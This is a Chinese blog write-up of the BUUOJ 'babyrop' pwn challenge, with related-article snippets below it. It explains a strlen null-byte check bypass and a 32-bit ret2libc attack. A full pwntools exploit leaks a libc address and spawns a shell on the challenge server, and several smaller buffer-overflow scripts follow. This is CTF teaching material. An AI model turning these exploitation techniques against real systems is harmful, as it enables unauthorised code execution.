Buuoj Pwn

原创 于 2022-05-22 12:56:23 发布 · 376 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #学习

babyrop WP

一道比较简单的ret2libc

考察点为strlen函数遇到\x00返回

但是有一个坑

IDA逆向拿到伪代码

main函数

 

逻辑是程序开始运行时读入一个随机数

然后传给并调用sub_804871F函数

sub_804871F函数

 

a1为main函数传入的随机数(buff)

格式化后将a1给了s

之后从终端读入数据给buf

然后将数组buf的某个元素变为0(这是一个坑)

之后获取buf的长度(strlen函数)

这里是第一个利用点:strlen函数遇到\x00则返回

然后根据strlen函数拿到的长度将buf与s比较

不同则程序退出

相同则将buf数组的第八个元素的值变为整数并返回

利用:可以将\x00作为第一个字节传入 使strlen返回长度为0 让后面的比较函数比较0个字节 即可绕过随机数

回到main函数

将返回值赋给v2

然后将v2作为参数传给sub_80487D0函数

sub_80487D0函数

可以看到

只要我们控制了a1的值

就能实现溢出

传入/xff即可

所以整体思路

读入\x00绕过随机数 同时传入\xff实现溢出 然后泄露write函数的got表地址 之后计算libc基地址

避坑:

 

 

正常情况下 我们会这样构造payload

'b\x00'+b'\xff'*7

利用红色框和黑色框中的代码

来实现绕过随机数并实现溢出

但是由于蓝色框的代码

如果我们这样传入8个字节

导致v5=8

使buf[7]=0

即buf的第八个元素被替换成了0

无法实现溢出

因此我们可以用senline()加入回车符达到v5=9或者是多传几个\xff

具体wp如下:

from pwn import *
#context.log_level = 'debug' 
#sh=process("./pwn")
sh=remote("node4.buuoj.cn",29053)
elf=ELF("./pwn")
write_got=elf.got['write']
write_plt=elf.plt['write']
main=0x8048825
#gdb.attach(sh,"b 0x08048825")
payload=b'\x00'+b'\xff'*7
sh.sendline(payload)#sendline()用来避坑 当然也可以传入更多\xff来避坑 道理一样
sh.recvuntil("Correct\n")
#32位传参
#write(1,write_got,4)
​
payload2=b'a'*0xe7+b'b'*0x4+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
sh.sendline(payload2)
write=u32(sh.recv(4))
success(hex(write))
​
libc=ELF("./libc-2.23.so")
libc_base=write-libc.symbols["write"]
shell=libc_base+libc.symbols["system"]
binsh=libc_base+libc.search(b'/bin/sh').__next__()
sh.sendline(payload)
sh.recvuntil("Correct\n")
​
payload3=b'a'*0xe7+b'b'*0x4+p32(shell)+p32(0000)+p32(binsh)#0000是system函数的retAddress
sh.sendline(payload3)
​
sh.interactive()

拿到shell

 

Visua1NULL
关注
buuoj Pwn wp 1-10
yongbaoii的博客
01-09 778
01 test_your_nc 直接连上就好了。 然后 cat flag 。 02 rip ret2text. 这多多少少有点问。 IDA里面是这样的,但是exp一直有问,然后试着连上直接跑,是这样的。 栈溢出到返回地址就行。 from pwn import* r = remote("node3.buuoj.cn",26737) context.log_level = "debug" system_addr = 0x401187 payload = 'a' * 23 + p64(syste
buuoj-Pwn-刷记录
Do1phln的博客
10-30 404
warmup_csaw_2016 目直接给出了函数位置,所以很明显就是要利用gets,gets参数的长度为0x40,所以我们再加上返回地址的8个字节,溢出的总长度为0x48,运行时候可以看出sub_40060D的地址就是它的名字,因此我们可以构建payload payload = b'a'*0x48+p64(0x40060D) 即可得到flag ciscn_2019_n_1 打开目可知大致意思是main函数里面调用了一过func函数,其中要输入v1,但是要判断v2,所以就很明显是需要输入长字符串覆盖到
buuoj pwn
FFY's Blog
10-07 1201
ret2text rip pwntools gdb 调试 gdb.debug(’./xxx’) pause() 在弹出窗口设好断点,用 python 传递不可打印字符 堆栈平衡,简单溢出 from pwn import * #context.log_level='debug' #p=remote('node3.buuoj.cn',27864) #p=gdb.debug('./pwn1') #pause() target_addr=0x401186 ret_addr=0x401016 pay='a'*(
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 613
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
BUUOj PWN 121-140
2h4ox1n9
12-17 178
121、ciscn_2019_final_5 122、picoctf_2018_are you root 123、[BJDCTF 2nd]diff 124、bjdctf_2020_YDSneedGrirlfriend 125、judgement_mna_2016 126、gyctf_2020_document 127、护网杯_2018_gettingstart 128、xman_2019_format
CTF buuoj pwn-----第2:rip
bing_Max的博客
08-28 3831
CTF buuoj pwn-----第2:rip 记录一下pwn的过程 同第1一样,新手学习日记,流水线记录. 打开目,连接靶机,下载文件’ript’ 1. 首先checkesc ,检测文件的保护机制. checksec在下载好pwntools后就有 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-lit
CTF buuoj pwn-----第10: bjdctf_2020_babystack
热门推荐
bing_Max的博客
09-28 2万+
思路 本体有后门函数, 最简单的是直接调用. 这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag 编写exp from pwn import * con
buuoj Pwn writeup 201-205
yongbaoii的博客
08-31 585
201 bbctf_2020_write canary是没有开的。环境是2.27的一个环境。 可以看到首先进去会给一个puts的地址,然后我们就可以获得libc的基地址。 又给出了一个栈地址,我们考虑可以直接去劫持got表,但是发现got表不能写。 那我们去考虑劫持main函数返回地址,但是又发现最后用exit去结束的。 exit没有hook,我们考虑怎么能把exit劫持掉。 劫持exit 简单点说就是。 exit()->__run_exit_handlers->_dl_fini->_
CTF buuoj pwn-----第3:warmup_csaw_2016
bing_Max的博客
08-29 2044
CTF buuoj pwn-----第3:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
buuoj Pwn writeup 241-245
yongbaoii的博客
08-31 423
241 [GKCTF 2021]checkin 逻辑也比较简单。 首先输入密码的时候可以有个溢出,但是只能溢出八个字节,就只能是做一个栈迁移。 然后有个检查,首先你的名字需要是admin,然后你的密码要走一个函数。 我们去看看那个函数。 好像很复杂。 0x4007f6那个函数点开。 瞬间明白是一个md5. 所以逻辑很简单,我们输入的密码通过md5加密之后要跟v4吻合。 我们发现密码admin的md5加密结果是那个。 所以就直接栈迁移就行。 栈迁移呢需要我们在bss上写东西,输入用户名可以做到,然后呢还
buuoj Pwn writeup 271-275
yongbaoii的博客
09-06 421
271 espcially_tu_2016 就是一个栈溢出。 但是这个最麻烦的是他scanf之后居然缓冲区里面有一个回车,导致我们gets的时候失败了,所以我们就gets了两次。 为了看看是scanf的问还是ios_c99scanf的问,做了个小实验。 编译的时候记得加-std=c89 但是发现scanf也是一样的效果。 就是会留下一个回车。 那我们试试读入字符串。 还是会有一个回车。 那我们下面再放一个scanf 再走第二个scanf的时候会刷新缓冲区的指针。 那如果放的是gets 跑程序的时
buuoj Pwn writeup 211-215
yongbaoii的博客
08-31 473
211 rootersctf_2019_babypwn 说白了就个栈溢出。 exp from pwn import* context.log_level = "debug" r = remote('node4.buuoj.cn', 27601) #r = process("./211") elf = ELF('./211') libc = ELF('./64/libc-2.27.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts']
buuoj Pwn writeup 66-70
yongbaoii的博客
02-23 359
66 ciscn_2019_final_3 保护 67 mrctf2020_shellcode 保护 68 hitcontraining_magicheap 保护 69 pwnable_start 保护 70 wustctf2020_getshell_2 保护
BUU PWN(一)
playmaker的博客
01-28 2363
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 502
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
buuoj Pwn writeup 206-210
yongbaoii的博客
08-31 571
206 ciscn_2019_c_3 一堆乱七八糟。 create 207 metasequoia_2020_summoner 208 linkctf_2018.7_babypie 209 wdb_2018_3rd_pesp 210 TWCTF_online_2019_asterisk_alloc
buuoj Pwn writeup 116-120
yongbaoii的博客
05-11 342
116 roarctf_2019_realloc_magic 117 [BJDCTF 2nd]rci 118 wustctf2020_number_game 119 picoctf_2018_are you root 120 [GKCTF2020]Domo
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 1097
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 406
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
pwn基础
最新发布
11-20
以下是一些pwn基础目的相关内容: - **目一**:该加载完成后直接f5反编译可得一串代码。做pwn的目的通常是获取flag,关键在于找到黑掉对方电脑的方法。在ctf pwn中,出人会设计漏洞,利用这些漏洞可查看服务器文件内容。本文件本身是一个后门函数,其作用是提升用户权限,执行`system('/bin/sh')`代码能让权限提升,进而查看其他文件获取flag。该真实考点是nc,在终端输入`nc node4.buuoj.cn 29499`可连接服务器,之后`cat flag`就能获得flag [^1]。 - **目二**:攻防世界XCTF - Pwn入门11中的签到,啥也不用干,直接可以获得shell然后拿到flag。解代码如下: ```python from pwn import * r = remote("111.198.29.45", 59457) r.interactive() r.close() ``` [^2] - **目三**:编写攻击程序的目,代码如下: ```python from pwn import * p = remote("node5.buuoj.cn", 28053) payload = b'a'*(0xf + 8) + p64(0x401186) p.send(payload) p.interactive() ``` [^3] - **目四**:已知buf真实大小为16个字节,溢出到返回地址需要20个字节垃圾数据,构造payload解。代码如下: ```python from pwn import * p = process('./pwn_01') # p = remote('pwn.node.game.sycsec.com', 30345) # gdb.attach(p) elf = ELF('./pwn_01') context(os="linux", arch="amd64", log_level='debug') backdoor = 0x80484b6 payload = b'a'*20 + p32(backdoor) p.recv() p.sendline(payload) p.interactive() ``` [^4] - **目五**:夏令营第二周pwn的level0,解代码如下: ```python s_addr = 0x0000000000400596 p = remote("pwn2.jarvisoj.com", 9881) p.recvline() p.sendline("A"*0x80 + 'A'*8 + p64(s_addr)) p.interactive() ``` [^5]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值